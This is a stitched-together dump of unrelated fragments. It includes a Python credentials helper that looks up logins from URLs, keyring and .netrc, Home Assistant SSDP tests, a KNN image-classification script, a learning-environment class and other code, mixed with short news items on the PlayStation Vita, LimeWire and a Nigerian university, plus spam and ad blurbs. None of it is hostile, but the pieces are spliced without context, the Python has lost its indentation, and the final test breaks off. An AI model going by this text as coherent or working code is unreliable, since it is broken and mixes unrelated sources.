""" Security / AuthN / AuthZ helpers.
"""
# Copyright © 2015 - 2019 Jürgen Hermann <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals, print_function
import re
import errno
import base64
import getpass
from netrc import netrc, NetrcParseError
try:
import keyring_DISABLED_FOR_NOW # TODO
except ImportError:
keyring = None
from ._compat import urlparse
__all__ = ['Credentials']
class Credentials():
"""Look up and provide authN credentials (username / password) from common sources."""
URL_RE = re.compile(r'^(http|https|ftp|ftps)://') # covers the common use cases
NETRC_FILE = None # use the default, unless changed for test purposes
AUTH_MEMOIZE_INPUT = {} # remember manual auth input across several queries in one run
def __init__(self, target):
"""``target`` is a representation of the secured object, typically an URL."""
self.target = target
self.user = None
self.password = None
self.keyring_service = target
self.source = None
def auth_valid(self):
"""Return bool indicating whether full credentials were provided."""
return bool(self.user and self.password)
def auth_pair(self, force_console=False):
"""Return username/password tuple, possibly prompting the user for them."""
if not self.auth_valid():
self._get_auth(force_console)
return (self.user, self.password)
def _raw_input(self, prompt=None):
"""Mockable wrapper for raw_input."""
return input(prompt)
def _get_auth(self, force_console=False):
"""Try to get login auth from known sources."""
if not self.target:
raise ValueError("Unspecified target ({!r})".format(self.target))
elif not force_console and self.URL_RE.match(self.target):
auth_url = urlparse(self.target)
source = 'url'
if auth_url.username:
self.user = auth_url.username
if auth_url.password:
self.password = auth_url.password
if not self.auth_valid():
source = self._get_auth_from_keyring()
if not self.auth_valid():
source = self._get_auth_from_netrc(auth_url.hostname)
if not self.auth_valid():
source = self._get_auth_from_console(self.target)
else:
source = self._get_auth_from_console(self.target)
if self.auth_valid():
self.source = source
def _get_auth_from_console(self, realm):
"""Prompt for the user and password."""
self.user, self.password = self.AUTH_MEMOIZE_INPUT.get(realm, (self.user, None))
if not self.auth_valid():
if not self.user:
login = getpass.getuser()
self.user = self._raw_input('Username for "{}" [{}]: '.format(realm, login)) or login
self.password = getpass.getpass('Password for "{}": '.format(realm))
Credentials.AUTH_MEMOIZE_INPUT[realm] = self.user, self.password
return 'console'
def _get_auth_from_netrc(self, hostname):
"""Try to find login auth in ``~/.netrc``."""
try:
hostauth = netrc(self.NETRC_FILE)
except IOError as cause:
if cause.errno != errno.ENOENT:
raise
return None
except NetrcParseError as cause:
raise # TODO: Map to common base class, so caller has to handle less error types?
# Try to find specific `user@host` credentials first, then just `host`
auth = hostauth.hosts.get('{}@{}'.format(self.user or getpass.getuser(), hostname), None)
if not auth:
auth = hostauth.hosts.get(hostname, None)
if auth:
username, account, password = auth # pylint: disable=unpacking-non-sequence
if username:
self.user = username
if password == 'base64':
# support for password obfuscation, prevent "over the shoulder lookup"
self.password = base64.b64decode(account).decode('ascii')
elif password:
self.password = password
return 'netrc'
def _get_password_from_keyring(self, accountname):
"""Query keyring for a password entry."""
return keyring.get_password(self.keyring_service, accountname)
def _get_auth_from_keyring(self):
"""Try to get credentials using `keyring <https://github.com/jaraco/keyring>`_."""
if not keyring:
return None
# Take user from URL if available, else the OS login name
password = self._get_password_from_keyring(self.user or getpass.getuser())
if password is not None:
self.user = self.user or getpass.getuser()
self.password = password
return 'keyring'
|
While this was a major accomplishment, it went almost entirely unnoticed. That could be, in part, because only two people in the world had a web browser to be able to access it. In fact, it wasn't until 1993 when Mosaic was released that the general populace had the ability to access any of the web.
For more on the history of the web, hit the break.
Sony had a powerful E3 presentation where Vita brought hope to all Sony fans and even myself that innovation had once again found itself ingrained within the Sony handheld's precious metals. While that seems to still be true, no one here in the US or Europe should expect to have their anxiety curbed this holiday season, according to Sony Executive Vice President Kazuo Hirai.
Despite the fact that Hirai announced at E3 the Vita would be available "starting from the holiday season this year," he made another announcement on August 4th that this would not be the case. The US and Europe but more importantly, the US, shouldn't expect Vita to grace store shelves until early next year. Missing out on the retail golden quarter might have certain ramifications for the Vita, more on that after the break.
WIRED:Report: Sony’s PlayStation Vita Will Miss Holiday Launch in U.S.
We have finally reached the end of the small battle between RIAA and LimeWire this week, as they have reached a payout agreement. You may recall that LimeWire has been on the hook for $105 million from several record labels and RIAA was so proud of themself from putting that together, that they felt they could pretty much do anything, so long as they got help from the crazy legislators in California.
This week we learned that LimeWire had to write a check for $12 million over to the Warner Music Group. That might not be as close to the $1 billion in damages Warner claimed to have had done to them at the hands of the former P2P software, but I suppose that's better than nothing. However, $12 million is only 1.7% of the amount of revenue Warner does in a quarter. So in the end, it's more like a drop in the Atlantic Ocean.
No matter how much money would be issued to these labels, though, it feels like they'd never be happy. Warner may have claimed $1 billion, but you know they would complain until they saw $3 billion in their account. Good news for them is that they were up 5% in revenue for the second quarter, attributed to digital sales that were up 13%. The number that is important is that they still were able post a net loss of $47 million. Seems like that $12 million might have helped them out more than they thought. |
from pygooglechart import StackedVerticalBarChart, Axis
from base import *
_Y_AXIS_SPACE = 36
class BucketStat(ChartStat):
def __init__(self, bucket_count, title, width, height):
ChartStat.__init__(self)
self.__buckets = [0] * bucket_count
self.__max = 0
self.__title = title
self.__width = width
self.__height = height
def _GetBucketCollection(self, message_infos, threads):
return message_infos
def ProcessMessageInfos(self, message_infos, threads):
for bucket_obj in self._GetBucketCollection(message_infos, threads):
bucket = self._GetBucket(bucket_obj)
if bucket is None: continue
self.__buckets[bucket] += 1
v = self.__buckets[bucket]
if v > self.__max:
self.__max = v
def GetHtml(self):
max = self._GetRescaledMax(self.__max)
w = self.__width
h = self.__height
# We don't really care about StackedVerticalBarChart vs.
# GroupedVerticalBarChart since we just have one data-set, but only the
# stacked graph seems to respect the bar spacing option
chart = StackedVerticalBarChart(w, h)
# Compute bar width so that it fits in the overall graph width.
bucket_width = (w - _Y_AXIS_SPACE)/len(self.__buckets)
bar_width = bucket_width * 4/5
space_width = bucket_width - bar_width
chart.set_bar_width(bar_width)
chart.set_bar_spacing(space_width)
chart.add_data(self._GetRescaledData(self.__buckets, max))
chart.set_axis_range(Axis.LEFT, 0, max)
chart.set_axis_labels(Axis.BOTTOM, self._GetBucketLabels())
# We render the title in the template instead of in the chart, to give
# stat collections and individual stats similar appearance
t = Template(
file="templates/bucket-stat.tmpl",
searchList = {
"id": self.id,
"title": self.__title,
"width": w,
"height": h,
"chart_url": chart.get_url()
})
return unicode(t)
class TimeOfDayStat(BucketStat):
def __init__(self):
BucketStat.__init__(self, 24, 'Time of day', 400, 200)
def _GetBucket(self, message_info):
return message_info.GetDate().tm_hour
def _GetBucketLabels(self):
return ['Midnight', '', '', '', '', '',
'6 AM', '', '', '', '', '',
'Noon', '', '', '', '', '',
' 6 PM', '', '', '', '', '']
class DayOfWeekStat(BucketStat):
def __init__(self):
BucketStat.__init__(self, 7, 'Day of week', 300, 200)
def _GetBucket(self, message_info):
# In the time tuple Monday is 0, but we want Sunday to be 0
return (message_info.GetDate().tm_wday + 1) % 7
def _GetBucketLabels(self):
return ['S', 'M', 'T', 'W', 'T', 'F', 'S']
class YearStat(BucketStat):
def __init__(self, date_range):
self.__years = GetYearRange(date_range)
width = _Y_AXIS_SPACE + 30 * len(self.__years)
BucketStat.__init__(
self, len(self.__years), "Year", width, 200)
def _GetBucket(self, message_info):
return message_info.GetDate().tm_year - self.__years[0]
def _GetBucketLabels(self):
return [str(x) for x in self.__years]
class MonthStat(BucketStat):
def __init__(self, year):
self.__year = year
# No title is necessary, since the stat collection provides one
BucketStat.__init__(self, 12, None, 300, 200)
def _GetBucket(self, message_info):
date = message_info.GetDate()
if date.tm_year == self.__year:
return date.tm_mon - 1
else:
return None
def _GetBucketLabels(self):
return MONTH_NAMES
class DayStat(BucketStat):
def __init__(self, year, month):
self.__year = year
self.__month = month
self.__days_in_month = calendar.monthrange(year, month)[1]
# No title is necessary, since the stat collection provides one
BucketStat.__init__(
self,
self.__days_in_month,
None,
500,
200)
def _GetBucket(self, message_info):
date = message_info.GetDate()
if date.tm_year == self.__year and date.tm_mon == self.__month:
return date.tm_mday - 1
else:
return None
def _GetBucketLabels(self):
return [str(d) for d in range(1, self.__days_in_month + 1)]
class SizeBucketStat(BucketStat):
_SIZE_BUCKETS = [
0,
1 << 9,
1 << 10,
1 << 11,
1 << 12,
1 << 13,
1 << 14,
1 << 15,
1 << 16,
1 << 17,
1 << 18,
1 << 19,
1 << 20,
1 << 21,
1 << 22,
1 << 23,
]
def __init__(self):
BucketStat.__init__(
self,
len(SizeBucketStat._SIZE_BUCKETS),
"Message sizes",
500,
200)
def _GetBucket(self, message_info):
size = message_info.size
for i in reversed(xrange(0, len(SizeBucketStat._SIZE_BUCKETS))):
if size >= SizeBucketStat._SIZE_BUCKETS[i]:
return i
def _GetBucketLabels(self):
return [GetDisplaySize(s) for s in SizeBucketStat._SIZE_BUCKETS]
class ThreadSizeBucketStat(BucketStat):
_SIZE_BUCKETS = [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
20,
30,
40,
50,
100,
150,
200,
]
def __init__(self):
BucketStat.__init__(
self,
len(ThreadSizeBucketStat._SIZE_BUCKETS),
"Thread lengths",
500,
200)
def _GetBucketCollection(self, message_infos, threads):
return threads
def _GetBucket(self, thread):
size = len(thread)
for i in reversed(xrange(0, len(ThreadSizeBucketStat._SIZE_BUCKETS))):
if size >= ThreadSizeBucketStat._SIZE_BUCKETS[i]:
return i
def _GetBucketLabels(self):
return [str(s) for s in ThreadSizeBucketStat._SIZE_BUCKETS] |
Vice Chancellor of Veritas University, Abuja, Prof. Michael Kwanahie, has restated the institution’s zero tolerance for cultism and other social vices commonly associated with students in tertiary institutions.
Kwanashie, who issued the warning while delivering an address at the 8th matriculation of the university held at its main campus in Bwari, Abuja, said culprits could face outright expulsion without an opportunity to make amends.
According to the VC, the warning became necessary as the university was also admitting students who have left other universities to pursue academic studies in the institution, stating that exam malpractice would not also be tolerated.
He dispelled claims that the social life of the school was boring and urged students to be of good conduct and create their own social life within the Campus instead of wanting to spend nights out in the City.
Speaking further on the employability of graduates from the institution, Kwanashie disclosed that in line with the mandatory entrepreneurship policy of the federal government for all universities, Veritas University ensures that no student graduates without proper training on entrepreneurship.
He said the university had gone into an agreement with CISCO to have CISCO-trained and certified graduates, adding that the institution was also trying to work-out an agreement with Microsoft Corporation to ensure that apart from their degrees, the students also have skills in other competencies.
The VC disclosed that the school also has a placement office where it can scout for jobs for students from employers and highlight areas of the students’ competencies.
Veritas University is currently experiencing tremendous growth in population as 452 students were matriculated for the 2016/2017 academic session, representing about two times the population matriculated in 2015. |
# Loading Data
import pandas as pd
from skimage.io import imread
import numpy as np
def read_data(typeData, labelsInfo, imageSize, path):
#Intialize x matrix
x = np.zeros((labelsInfo.shape[0], imageSize))
for (index, idImage) in enumerate(labelsInfo["ID"]):
#Read image file
nameFile = "{0}/{1}Resized/{2}.Bmp".format(path, typeData, idImage)
img = imread(nameFile, as_grey=True)
x[index, :] = np.reshape(img, (1, imageSize))
return x
imageSize = 400 # 20 x 20 pixels
#Set location of data files , folders
path = "/home/guo/haplox/Github/first_step_with_julia_kaggle/data/data"
labelsInfoTrain = pd.read_csv("{0}/trainLabels.csv".format(path))
#Read training matrix
xTrain = read_data("train", labelsInfoTrain, imageSize, path)
#Read information about test data ( IDs ).
labelsInfoTest = pd.read_csv("{0}/sampleSubmission.csv".format(path))
#Read test matrix
xTest = read_data("test", labelsInfoTest, imageSize, path)
yTrain = map(ord, labelsInfoTrain["Class"])
yTrain = np.array(yTrain)
# Importing main functions
from sklearn.cross_validation import cross_val_score as k_fold_CV
from sklearn.neighbors import KNeighborsClassifier as KNN
from sklearn.grid_search import GridSearchCV
# Running LOOF-CV with 1NN sequentially
import time
start = time.time()
model = KNN(n_neighbors=1)
cvAccuracy = np.mean(k_fold_CV(model, xTrain, yTrain, cv=2, scoring="accuracy"))
print "The 2-CV accuracy of 1NN", cvAccuracy
print time.time() - start, "seconds elapsed"
# Tuning the value for k
start = time.time()
tuned_parameters = [{"n_neighbors":list(range(1,5))}]
clf = GridSearchCV( model, tuned_parameters, cv=5, scoring="accuracy")
clf.fit(xTrain, yTrain)
print clf.grid_scores_
print time.time() - start, "seconds elapsed"
|
48 Modern Living Room Ideas Decoration Channel Unique Modern Decor Ideas For Living Room is an amazing photo that can use for personal and non-commercial purpose since all trademarks referenced herein are the properties of their particular proprietors.
Don’t forget to share this 48 Modern Living Room Ideas Decoration Channel Unique Modern Decor Ideas For Living Room to your social media to share information about 48 Modern Living Room Ideas Decoration Channel Unique Modern Decor Ideas For Living Room to your friends and to keep this website growing. In the event that you want to see an image in the larger size simply hit an image on the gallery below and the image will be displayed at the top of this page. |
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from core.events import EventManager
from core.task import StateChanged, MessageReceived, \
SequenceReceived, OutputSequenceUpdated, OutputMessageUpdated
from core.obs.observer import Observable
from core.serializer import ScramblingSerializerWrapper
from core.channels import InputChannel, OutputChannel
from core.byte_channels import ByteInputChannel, ByteOutputChannel
from collections import defaultdict
import logging
class Environment:
'''
The Environment is the one that communicates with the Learner,
interpreting its output and reacting to it. The interaction is governed
by an ongoing task which is picked by a TaskScheduler object.
:param serializer: a Serializer object that translates text into binary and
back.
:param task_scheduler: a TaskScheduler object that determines which task
is going to be run next.
:param scramble: if True, the words outputted by the tasks are randomly
scrambled.
:param max_reward_per_task: maximum amount of reward that a learner can
receive for a given task.
'''
def __init__(self, serializer, task_scheduler, scramble=False,
max_reward_per_task=10000, byte_mode=False):
# save parameters into member variables
self._task_scheduler = task_scheduler
self._serializer = serializer
self._max_reward_per_task = max_reward_per_task
# cumulative reward per task
self._reward_per_task = defaultdict(int)
# the event manager is the controller that dispatches
# changes in the environment (like new inputs or state changes)
# to handler functions in the tasks that tell the environment
# how to react
self.event_manager = EventManager()
# intialize member variables
self._current_task = None
self._current_world = None
if scramble:
serializer = ScramblingSerializerWrapper(serializer)
if byte_mode:
# we hear to our own output
self._output_channel_listener = ByteInputChannel(serializer)
# output channel
self._output_channel = ByteOutputChannel(serializer)
# input channel
self._input_channel = ByteInputChannel(serializer)
else:
# we hear to our own output
self._output_channel_listener = InputChannel(serializer)
# output channel
self._output_channel = OutputChannel(serializer)
# input channel
self._input_channel = InputChannel(serializer)
# priority of ongoing message
self._output_priority = 0
# reward that is to be given at the learner at the end of the task
self._reward = None
self._result = None
self._last_result = None
# reward that is to be given immediately
self._immediate_reward = None
# Current task time
self._task_time = None
# Task separator issued
self._task_separator_issued = False
# Internal logger
self.logger = logging.getLogger(__name__)
# signals
self.world_updated = Observable()
self.task_updated = Observable()
# Register channel observers
self._input_channel.sequence_updated.register(
self._on_input_sequence_updated)
self._input_channel.message_updated.register(
self._on_input_message_updated)
self._output_channel_listener.sequence_updated.register(
self._on_output_sequence_updated)
self._output_channel_listener.message_updated.register(
self._on_output_message_updated)
def next(self, learner_input):
'''Main loop of the Environment. Receives one bit from the learner and
produces a response (also one bit)'''
self._last_result = None # will be set while execution is inside this function or its child tree
# Make sure we have a task
if not self._current_task:
self._switch_new_task()
# If the task has not reached the end by either Timeout or
# achieving the goal
if not self._current_task.has_ended():
reward = None
# Check if a Timeout occurred
self._current_task.check_timeout(self._task_time)
# Process the input from the learner and raise events
if learner_input is not None:
# record the input from the learner and deserialize it
# TODO this bit is dropped otherwise on a timeout...
self._input_channel.consume(learner_input)
# switch to next task immediately if this input caused the task to end
# and there is no feedback to output (output_channel is empty)
if self._current_task.has_ended() and self._output_channel.is_empty():
self._switch_new_task()
# We are in the middle of the task, so no rewards are given
else:
# If the task is ended and there is nothing else to say,
# issue a silence and then return reward and move to next task
if self._output_channel.is_empty():
if self._task_separator_issued or self._should_skip_separator():
# Have nothing more to say
# reward the learner if necessary and switch to new task
reward = self._reward if self._reward is not None else 0
self._switch_new_task()
self._task_separator_issued = False
else:
self._output_channel.set_message(
self._serializer.SILENCE_TOKEN)
self._task_separator_issued = True
reward = None
else:
# TODO: decide what to do here.
# Should we consume the bit or not?
self._input_channel.consume(learner_input)
# If there is still something to say, continue saying it
reward = None
# Get one bit from the output buffer and ship it
if self._output_channel.is_empty():
self._output_channel.set_message(self._serializer.SILENCE_TOKEN)
output = self._output_channel.consume()
# we hear to ourselves
self._output_channel_listener.consume(output)
# advance time
self._task_time += 1
if self._immediate_reward is not None and reward is None:
reward = self._immediate_reward
self._immediate_reward = None
if reward is not None:
# process the reward (clearing it if it's not allowed)
reward = self._allowable_reward(reward)
else:
reward = 0
return output, reward
def get_reward_per_task(self):
'''
Returns a dictonary that contains the cumulative reward for each
task.
'''
return self._reward_per_task
def _allowable_reward(self, reward):
'''Checks if the reward is allowed within the limits of the
`max_reward_per_task` parameter, and resets it to 0 if not.'''
task_name = self._current_task.get_name()
if self._reward_per_task[task_name] < self._max_reward_per_task:
self._reward_per_task[task_name] += reward
return reward
else:
return 0
def is_silent(self):
'''
Tells if the environment is sending any information through the output
channel.
'''
return self._output_channel.is_silent()
def _on_input_sequence_updated(self, sequence):
if self.event_manager.raise_event(SequenceReceived(sequence)):
self.logger.debug("Sequence received by running task: '{0}'".format(
sequence))
def _on_input_message_updated(self, message):
# send the current received message to the task
if self.event_manager.raise_event(MessageReceived(
message)):
self.logger.debug("Message received by running task: '{0}'".format(
message))
def _on_output_sequence_updated(self, sequence):
self.event_manager.raise_event(OutputSequenceUpdated(sequence))
def _on_output_message_updated(self, message):
self.event_manager.raise_event(OutputMessageUpdated(message))
def _should_skip_separator(self):
return hasattr(self._current_task, 'skip_task_separator') and self._current_task.skip_task_separator
def set_result(self, result, message='', priority=0, provide_result_as_reward=True):
# the following two ifs prevent repeating the same feedback ad infinitum, which otherwise happens in mini-tasks
# in case of a repeated invalid input. self._result is set back to None every time a new task is switched.
if self._result is True and result is True:
return
if self._result is False and result is False:
return
if provide_result_as_reward:
self._reward = result
self._result = result
self._current_task.end()
self.logger.debug('Terminating instance with result {0} with message "{1}"'
' and priority {2}'
.format(result, message, priority))
# adds a final space to the final message of the task
# to separate the next task instructions
self.set_message(message, priority)
def set_immediate_reward(self, reward):
'''Sets the reward immediately'''
self._immediate_reward = reward
self.logger.debug('Setting immediate reward {}'.format(reward))
def set_message(self, message, priority=0):
''' Saves the message in the output buffer so it can be delivered
bit by bit. It overwrites any previous content.
'''
if self._output_channel.is_empty() or priority >= self._output_priority:
self.logger.debug('Setting message "{0}" with priority {1}'
.format(message, priority))
self._output_channel.set_message(message)
self._output_priority = priority
else:
self.logger.info(
'Message "{0}" blocked because of '
'low priority ({1}<{2}) '.format(
message, priority, self._output_priority)
)
def raise_event(self, event):
return self.event_manager.raise_event(event)
def raise_state_changed(self):
'''
This rases a StateChanged Event, meaning that something
in the state of the world or the tasks changed (but we
don't keep track what)
'''
# state changed events can only be raised if the current task is
# started
if self._current_task and self._current_task.has_started():
# tasks that have a world should also take the world state as
# an argument
if self._current_world:
self.raise_event(StateChanged(
self._current_world.state, self._current_task.state))
else:
self.raise_event(StateChanged(self._current_task.state))
return True
return False
def _switch_new_task(self):
'''
Asks the task scheduler for a new task,
reset buffers and time, and registers the event handlers
'''
# deregister previous event managers
if self._current_task:
self._current_task.deinit()
self._deregister_task_triggers(self._current_task)
# pick a new task
if self._result != None:
self._last_result = self._result
self._task_scheduler.reward(self._result)
self._result = None
self._current_task = self._task_scheduler.get_next_task()
try:
# This is to check whether the user didn't mess up in instantiating
# the class
self._current_task.get_world()
except TypeError:
raise RuntimeError("The task {0} is not correctly instantiated. "
"Are you sure you are not forgetting to "
"instantiate the class?".format(
self._current_task))
self.logger.debug("Starting new task: {0}".format(self._current_task))
# check if it has a world:
if self._current_task.get_world() != self._current_world:
# if we had an ongoing world, end it.
if self._current_world:
self._current_world.end()
self._deregister_task_triggers(self._current_world)
self._current_world = self._current_task.get_world()
if self._current_world:
# register new event handlers for the world
self._register_task_triggers(self._current_world)
# initialize the new world
self._current_world.start(self)
self.world_updated(self._current_world)
# reset state
self._task_time = 0
self._reward = None
self._input_channel.clear()
self._output_channel.clear()
self._output_channel_listener.clear()
# register new event handlers
self._register_task_triggers(self._current_task)
# start the task, sending the current environment
# so it can interact by sending back rewards and messages
self._current_task.start(self)
self.task_updated(self._current_task)
def _deregister_task_triggers(self, task):
for trigger in task.get_triggers():
try:
self.event_manager.deregister(task, trigger)
except ValueError:
# if the trigger was not registered, we don't worry about it
pass
except KeyError:
# if the trigger was not registered, we don't worry about it
pass
task.clean_dynamic_handlers()
def _register_task_triggers(self, task):
for trigger in task.get_triggers():
self._register_task_trigger(task, trigger)
def _register_task_trigger(self, task, trigger):
self.event_manager.register(task, trigger)
|
VERIFY: Can cell phone usage at gas pumps cause explosions?
A WUSA9 viewer came across an article that claims a car exploded at a gas station after parents let their kids play a mobile game on a cell phone.
VERIFY: Did YouTube's fake news feature flag Notre Dame live streams, provide information about 9/11?
A YouTube spokesperson confirmed an information panel about 9/11 accompanied live streams of a burning Notre Dame, before the panels were deactivated on all streams.
It's tax deadline season and our Verify team is fact-checking all the online rumors that you may have questions about.
VERIFY: Does filing separately from your spouse mean forfeiting your student loan deduction?
Fox Business issued a correction Thursday morning for a typo on a Georgetown University polling graphic after the GU Politics Director called them out for the mistake.
VERIFY: Is there a policy against walking dogs on Howard University?
A PoPville blog post has readers buzzing: Can you walk your pup on private grounds?
VERIFY | First three House bills introduced by Democrats in 2019: impeachment, electoral college ban, and $54 million in foreign aid?
Political mudslinging online is nothing new, but is this next viral meme legit about the first three bills Democrats in the house introduced? The Verify team got answers. |
"""Test the SSDP integration."""
import asyncio
from unittest.mock import Mock, patch
import aiohttp
import pytest
from homeassistant.components import ssdp
from tests.common import mock_coro
async def test_scan_match_st(hass, caplog):
"""Test matching based on ST."""
scanner = ssdp.Scanner(hass, {"mock-domain": [{"st": "mock-st"}]})
with patch(
"netdisco.ssdp.scan",
return_value=[
Mock(
st="mock-st",
location=None,
values={"usn": "mock-usn", "server": "mock-server", "ext": ""},
)
],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert len(mock_init.mock_calls) == 1
assert mock_init.mock_calls[0][1][0] == "mock-domain"
assert mock_init.mock_calls[0][2]["context"] == {"source": "ssdp"}
assert mock_init.mock_calls[0][2]["data"] == {
ssdp.ATTR_SSDP_ST: "mock-st",
ssdp.ATTR_SSDP_LOCATION: None,
ssdp.ATTR_SSDP_USN: "mock-usn",
ssdp.ATTR_SSDP_SERVER: "mock-server",
ssdp.ATTR_SSDP_EXT: "",
}
assert "Failed to fetch ssdp data" not in caplog.text
@pytest.mark.parametrize(
"key", (ssdp.ATTR_UPNP_MANUFACTURER, ssdp.ATTR_UPNP_DEVICE_TYPE)
)
async def test_scan_match_upnp_devicedesc(hass, aioclient_mock, key):
"""Test matching based on UPnP device description data."""
aioclient_mock.get(
"http://1.1.1.1",
text=f"""
<root>
<device>
<{key}>Paulus</{key}>
</device>
</root>
""",
)
scanner = ssdp.Scanner(hass, {"mock-domain": [{key: "Paulus"}]})
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert len(mock_init.mock_calls) == 1
assert mock_init.mock_calls[0][1][0] == "mock-domain"
assert mock_init.mock_calls[0][2]["context"] == {"source": "ssdp"}
async def test_scan_not_all_present(hass, aioclient_mock):
"""Test match fails if some specified attributes are not present."""
aioclient_mock.get(
"http://1.1.1.1",
text="""
<root>
<device>
<deviceType>Paulus</deviceType>
</device>
</root>
""",
)
scanner = ssdp.Scanner(
hass,
{
"mock-domain": [
{
ssdp.ATTR_UPNP_DEVICE_TYPE: "Paulus",
ssdp.ATTR_UPNP_MANUFACTURER: "Paulus",
}
]
},
)
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert not mock_init.mock_calls
async def test_scan_not_all_match(hass, aioclient_mock):
"""Test match fails if some specified attribute values differ."""
aioclient_mock.get(
"http://1.1.1.1",
text="""
<root>
<device>
<deviceType>Paulus</deviceType>
<manufacturer>Paulus</manufacturer>
</device>
</root>
""",
)
scanner = ssdp.Scanner(
hass,
{
"mock-domain": [
{
ssdp.ATTR_UPNP_DEVICE_TYPE: "Paulus",
ssdp.ATTR_UPNP_MANUFACTURER: "Not-Paulus",
}
]
},
)
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert not mock_init.mock_calls
@pytest.mark.parametrize("exc", [asyncio.TimeoutError, aiohttp.ClientError])
async def test_scan_description_fetch_fail(hass, aioclient_mock, exc):
"""Test failing to fetch description."""
aioclient_mock.get("http://1.1.1.1", exc=exc)
scanner = ssdp.Scanner(hass, {})
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
):
await scanner.async_scan(None)
async def test_scan_description_parse_fail(hass, aioclient_mock):
"""Test invalid XML."""
aioclient_mock.get(
"http://1.1.1.1",
text="""
<root>INVALIDXML
""",
)
scanner = ssdp.Scanner(hass, {})
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
):
await scanner.async_scan(None)
|
We have a Vandercook press that needs a motivated printmaker, with a positive attitude, who wants to start a creative print making program.
There are opportunities for exhibitions, workshops, classes, and whatever you are willing to create and execute; get creative— Thomasville Center for the Arts is dedicated to elevating artist to their fullest potential. Please contact Darlene Taylor for more information about this Internship/Artist Residency, which begins early August. |
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2008-2012 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <[email protected]>
##
"""Spreedsheet Exporter Dialog"""
import gio
import gtk
from stoqlib.api import api
from stoqlib.exporters.xlsexporter import XLSExporter
from stoqlib.lib.message import yesno
from stoqlib.lib.translation import stoqlib_gettext
_ = stoqlib_gettext
class SpreadSheetExporter:
"""A dialog to export data to a spreadsheet
"""
title = _('Exporter to Spreadseet')
def export(self, object_list, name, filename_prefix, data=None):
xls = XLSExporter(name)
xls.add_from_object_list(object_list, data)
temporary = xls.save(filename_prefix)
self.export_temporary(temporary)
def export_temporary(self, temporary):
mime_type = 'application/vnd.ms-excel'
app_info = gio.app_info_get_default_for_type(mime_type, False)
if app_info:
action = api.user_settings.get('spreadsheet-action')
if action is None:
action = 'open'
else:
action = 'save'
if action == 'ask':
action = self._ask(app_info)
if action == 'open':
temporary.close()
self._open_application(mime_type, temporary.name)
elif action == 'save':
self._save(temporary)
def _ask(self, app_info):
# FIXME: What if the user presses esc? Esc will return False
# and open action will be executed. Esc should cancel the action
if yesno(_("A spreadsheet has been created, "
"what do you want to do with it?"),
gtk.RESPONSE_NO,
_('Save it to disk'),
_("Open with %s") % (app_info.get_name())):
return 'save'
else:
return 'open'
def _open_application(self, mime_type, filename):
app_info = gio.app_info_get_default_for_type(mime_type, False)
gfile = gio.File(path=filename)
app_info.launch([gfile])
def _save(self, temp):
chooser = gtk.FileChooserDialog(
_("Export Spreadsheet..."), None,
gtk.FILE_CHOOSER_ACTION_SAVE,
(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
chooser.set_do_overwrite_confirmation(True)
xls_filter = gtk.FileFilter()
xls_filter.set_name(_('Excel Files'))
xls_filter.add_pattern('*.xls')
chooser.add_filter(xls_filter)
response = chooser.run()
filename = None
if response != gtk.RESPONSE_OK:
chooser.destroy()
return
filename = chooser.get_filename()
ext = '.xls'
chooser.destroy()
if not filename.endswith(ext):
filename += ext
# Open in binary format so windows dont replace '\n' with '\r\n'
open(filename, 'wb').write(temp.read())
temp.close()
|
Have a book related company? Are you a creator of a piece of bookmarking software? This book logo icon may be the perfect fit for you! |
#!/usr/bin/env python3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from io import StringIO
import os
import sys
import unittest
import tempfile
from generate_framework_tests_and_coverage import generate_framework_tests_and_coverage
from models import TestPartitionDescription
from models import TestPlatform
TEST_DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"test_data")
class GenerateFrameworkTestsAndCoverageTest(unittest.TestCase):
def test_coverage(self):
actions_filename = os.path.join(TEST_DATA_DIR, "test_actions.csv")
coverage_filename = os.path.join(TEST_DATA_DIR,
"test_unprocessed_coverage.csv")
custom_partitions = [
TestPartitionDescription(
action_name_prefixes={"state_change_b"},
browsertest_dir=TEST_DATA_DIR,
